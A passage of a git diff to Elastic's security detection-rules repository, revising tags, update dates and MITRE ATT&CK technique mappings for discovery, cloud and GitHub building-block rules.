"OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -81,7 +91,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" @@ -92,7 +101,21 @@ id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1039" +name = "Data from Network Shared Drive" +reference = "https://attack.mitre.org/techniques/T1039/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules_building_block/discovery_of_domain_groups.toml b/rules_building_block/discovery_of_domain_groups.toml index 491bfd23563..c64491dcc33 100644 --- a/rules_building_block/discovery_of_domain_groups.toml +++ b/rules_building_block/discovery_of_domain_groups.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/17" [rule] author = ["Elastic"] @@ -44,18 +44,14 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_posh_generic.toml b/rules_building_block/discovery_posh_generic.toml index ca32bc8cca0..d25af55f2b8 100644 --- a/rules_building_block/discovery_posh_generic.toml +++ b/rules_building_block/discovery_posh_generic.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -25,7 +25,15 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -193,7 +201,6 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" @@ -204,11 +211,6 @@ id = "T1012" name = "Query Registry" reference = "https://attack.mitre.org/techniques/T1012/" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -220,25 +222,24 @@ name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -249,6 +250,7 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" + [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" @@ -268,18 +270,37 @@ reference = "https://attack.mitre.org/techniques/T1482/" id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" - [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" + [[rule.threat.technique]] id = "T1615" name = "Group Policy Discovery" reference = "https://attack.mitre.org/techniques/T1615/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/discovery_posh_password_policy.toml b/rules_building_block/discovery_posh_password_policy.toml index 7b517268c32..fe12f739745 100644 --- a/rules_building_block/discovery_posh_password_policy.toml +++ b/rules_building_block/discovery_posh_password_policy.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -88,7 +88,16 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -133,16 +142,34 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml index b27f77bdb79..ca94235feb2 100644 --- a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml +++ b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -133,18 +133,24 @@ network where host.os.type == "windows" and network.protocol == "dns" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique.subtechnique]] id = "T1016.001" name = "Internet Connection Discovery" reference = "https://attack.mitre.org/techniques/T1016/001/" + +[[rule.threat.technique]] +id = "T1614" +name = "System Location Discovery" +reference = "https://attack.mitre.org/techniques/T1614/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_potential_memory_seeking_activity.toml b/rules_building_block/discovery_potential_memory_seeking_activity.toml index 35696a3bf62..1296b79194d 100644 --- a/rules_building_block/discovery_potential_memory_seeking_activity.toml +++ b/rules_building_block/discovery_potential_memory_seeking_activity.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -58,3 +58,15 @@ process where host.os.type == "linux" and event.type == "start" and event.action ) ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml index c11eb222786..8b0c1ba8a90 100644 --- a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml +++ b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -51,10 +51,21 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + +[[rule.threat.technique.subtechnique]] +id = "T1518.001" +name = "Security Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml index 6efa2a5e64d..49272de507f 100644 --- a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml +++ b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -93,7 +93,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" @@ -104,17 +103,9 @@ id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_security_software_wmic.toml b/rules_building_block/discovery_security_software_wmic.toml index cc4036d6568..ace9b215e1b 100644 --- a/rules_building_block/discovery_security_software_wmic.toml +++ b/rules_building_block/discovery_security_software_wmic.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/10/19" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -77,18 +77,31 @@ process.args : "/namespace:\\\\root\\SecurityCenter2" and process.args : "Get" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" - [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/discovery_suspicious_proc_enumeration.toml b/rules_building_block/discovery_suspicious_proc_enumeration.toml index ecbdf328a3a..5416dfa0a22 100644 --- a/rules_building_block/discovery_suspicious_proc_enumeration.toml +++ b/rules_building_block/discovery_suspicious_proc_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -62,16 +62,22 @@ file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.nam [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threshold] field = ["host.id", "process.pid", "process.name"] value = 1 diff --git a/rules_building_block/discovery_system_network_connections.toml b/rules_building_block/discovery_system_network_connections.toml index 64bbd52e576..b226cb4c1aa 100644 --- a/rules_building_block/discovery_system_network_connections.toml +++ b/rules_building_block/discovery_system_network_connections.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -45,11 +45,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -59,6 +54,7 @@ reference = "https://attack.mitre.org/techniques/T1049/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_system_service_discovery.toml b/rules_building_block/discovery_system_service_discovery.toml index 1f8c79219de..4810cc175fd 100644 --- a/rules_building_block/discovery_system_service_discovery.toml +++ b/rules_building_block/discovery_system_service_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/01/24" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -70,18 +70,14 @@ process where host.os.type == "windows" and event.type == "start" and process.pa [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" reference = "https://attack.mitre.org/techniques/T1007/" -[[rule.threat.technique]] -id = "T1135" -name = "Network Share Discovery" -reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_win_network_connections.toml b/rules_building_block/discovery_win_network_connections.toml index 6fd29c4a0e4..dc1f9d25751 100644 --- a/rules_building_block/discovery_win_network_connections.toml +++ b/rules_building_block/discovery_win_network_connections.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -52,28 +52,19 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" reference = "https://attack.mitre.org/techniques/T1049/" [[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1135" -name = "Network Share Discovery" -reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/entra_id_identity_protection_risk_detections.toml b/rules_building_block/entra_id_identity_protection_risk_detections.toml index d1a6a5ecaf6..ba23d68e913 100644 --- a/rules_building_block/entra_id_identity_protection_risk_detections.toml +++ b/rules_building_block/entra_id_identity_protection_risk_detections.toml @@ -4,7 +4,7 @@ creation_date = "2025/05/18" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -29,7 +29,16 @@ risk_score = 47 rule_id = "da0d4bae-33ee-11f0-a59f-f661ea17fbcd" setup = "" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Data Source: Microsoft Entra ID Protection Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Protection", + "Data Source: Microsoft Entra ID Protection Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -37,38 +46,3 @@ query = ''' event.dataset: "azure.identity_protection" ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/execution_aws_lambda_function_updated.toml b/rules_building_block/execution_aws_lambda_function_updated.toml index a6e9fa6842e..773ea2fdede 100644 --- a/rules_building_block/execution_aws_lambda_function_updated.toml +++ b/rules_building_block/execution_aws_lambda_function_updated.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/01" [rule] author = ["Elastic"] @@ -36,7 +36,15 @@ references = [ risk_score = 21 rule_id = "1251b98a-ff45-11ee-89a1-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Asset Visibility", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Lambda", + "Use Case: Asset Visibility", + "Tactic: Execution", + "Rule Type: BBR" +] timestamp_override = "event.ingested" type = "query" @@ -50,31 +58,14 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.006" -name = "vSphere Installation Bundles" -reference = "https://attack.mitre.org/techniques/T1505/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml index 9f0a71e6543..481941c1220 100644 --- a/rules_building_block/execution_github_new_event_action_for_pat.toml +++ b/rules_building_block/execution_github_new_event_action_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence GitHub Event for a Personal Access Token (PAT)" risk_score = 21 rule_id = "ce08b55a-f67d-4804-92b5-617b0fe5a5b5" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Persistence", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,21 +37,17 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "event.action"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml index d214860a434..cb75d586d8b 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of Private Repo Event from Specific GitHub Personal Acc risk_score = 21 rule_id = "1e9b271c-8caa-4e20-aed8-e91e34de9283" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -31,21 +38,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.repo"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml index 50b57366d35..ba867350a28 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_user.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of GitHub User Interaction with Private Repo" risk_score = 21 rule_id = "01c49712-25bc-49d2-a27d-d7ce52f5dc49" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,21 +37,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.repo"] diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml index a21707d6f12..0b5f2635db1 100644 --- a/rules_building_block/execution_github_repo_created.toml +++ b/rules_building_block/execution_github_repo_created.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "GitHub Repo Created" risk_score = 21 rule_id = "6cea88e4-6ce2-4238-9981-a54c140d6336" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Resource Development", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "eql" @@ -28,18 +35,14 @@ configuration where event.dataset == "github.audit" and event.action == "repo.cr [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1583" -name = "Acquire Infrastructure" -reference = "https://attack.mitre.org/techniques/T1583/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1583.006" -name = "Web Services" -reference = "https://attack.mitre.org/techniques/T1583/006/" [rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml index 4c857b6a80f..33a822c8378 100644 --- a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml +++ b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of GitHub Repo Interaction From a New IP" risk_score = 21 rule_id = "0294f105-d7af-4a02-ae90-35f56763ffa2" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,21 +37,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.repo", "github.actor_ip"] diff --git a/rules_building_block/execution_linux_segfault.toml b/rules_building_block/execution_linux_segfault.toml index 50dbe75c7ed..e1d006ca679 100644 --- a/rules_building_block/execution_linux_segfault.toml +++ b/rules_building_block/execution_linux_segfault.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -55,3 +55,11 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" 